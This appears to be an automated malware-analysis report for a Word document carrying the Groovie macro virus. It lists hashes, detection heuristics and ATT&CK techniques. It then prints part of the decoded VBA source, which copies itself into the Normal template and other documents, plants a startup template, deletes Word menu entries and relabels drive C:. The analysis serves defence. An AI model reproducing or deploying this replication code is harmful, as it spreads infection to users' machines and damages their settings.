Office (OLE) malware analysis — malicious · edab74933d2abcff

MALICIOUS

Office (OLE)

46.5 KB Created: 1998-05-23 21:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 52ae4cea7be415491d94e048e6d947e7 SHA-1: bf8824bae27458c0c24c6551ffd8c8b269754196 SHA-256: edab74933d2abcff8df013a69b5095da8a0a33e25fc6111be194ae8b0384bdc5

360 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

This document contains legacy WordBasic markers and VBA macros, including AutoOpen and Auto_Close functions. The critical OLE_VBA_SHELL heuristic indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. ClamAV detections further confirm its malicious nature, identifying it as Doc.Trojan.Groovie-2.

Heuristics 7

ClamAV: Doc.Trojan.Groovie-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Groovie-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25213 bytes
SHA-256: `18adc8840ffe84bd2222f6a2a0eb006746a1fc49568939526efb4b239b65ba59`
Detection ClamAV: Doc.Trojan.Groov-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "groovie" Public WhoAmI As String Public DataDot As Boolean Public NormInstalled As Boolean Public DocInstalled As Boolean Public NormReadOnly As Boolean Public HoldDoc As String Public DocThere As Boolean Public Final_Close_Called As Boolean Function ID_Status() On Error Resume Next If MacroContainer = NormalTemplate Then WhoAmI = "normal" GoTo checkout End If If MacroContainer = ActiveDocument Then WhoAmI = "document" If MacroContainer = "data.dot" Then WhoAmI = "orbit" checkout: End Function Function Install_Status() On Error Resume Next If Dir(Application.StartupPath + "\data.dot") = "data.dot" Then DataDot = True For I = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(I).Name = "groovie" Then DocInstalled = True Next I For I = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(I).Name = "groovie" Then NormInstalled = True Next I If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _ GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True End Function Function The_Groovie_Core() On Error Resume Next Call ID_Status Call Install_Status If WhoAmI = "document" Then Call DocCodeCore If WhoAmI = "normal" Then Call NormCodeCore If WhoAmI = "orbit" Then Call OrbitCoreCode If NormReadOnly = False Then CommandBars("tools").Controls("Macro").Delete If NormReadOnly = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete End Function Function DocCodeCore() On Error Resume Next Application.VBE.ActiveVBProject.VBComponents("groovie").Export "c:\groovie.sys" If NormInstalled = False And NormReadOnly = False Then With NormalTemplate.VBProject With .VBComponents.Import("c:\groovie.sys") End With End With End If If DataDot = False Then ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _ FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False Application.OrganizerRename Source:=Application.StartupPath + "\data.dot", Name:="groovie", NewName:="orbit", Object:=wdOrganizerObjectProjectItems ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _ FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName If Final_Close_Called = False Then Documents.Open FileName:=HoldDoc Shell ("label c: groovie"), 0 Windows(1).Close End If End Function Function NormCodeCore() On Error Resume Next Application.ScreenUpdating = False Call Check_For_Doc If DocInstalled = False And DocThere = True Then With ActiveDocument.VBProject With .VBComponents.Import("c:\groovie.sys") End With End With With Dialogs(wdDialogFileSummaryInfo) .Comments = "ALT-F11 says it's groovie!" .Execute End With End If If DataDot = False And DocThere = True Then ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _ FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False Application.OrganizerRename Source:=Application.StartupPath + "\data.dot", Name:="groovie", NewName:="orbit", Object:=wdOrganizerObjectProjectItems ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _ FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False If Final_Close_Called = False Then Documents.Open FileName:=HoldDoc Win ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.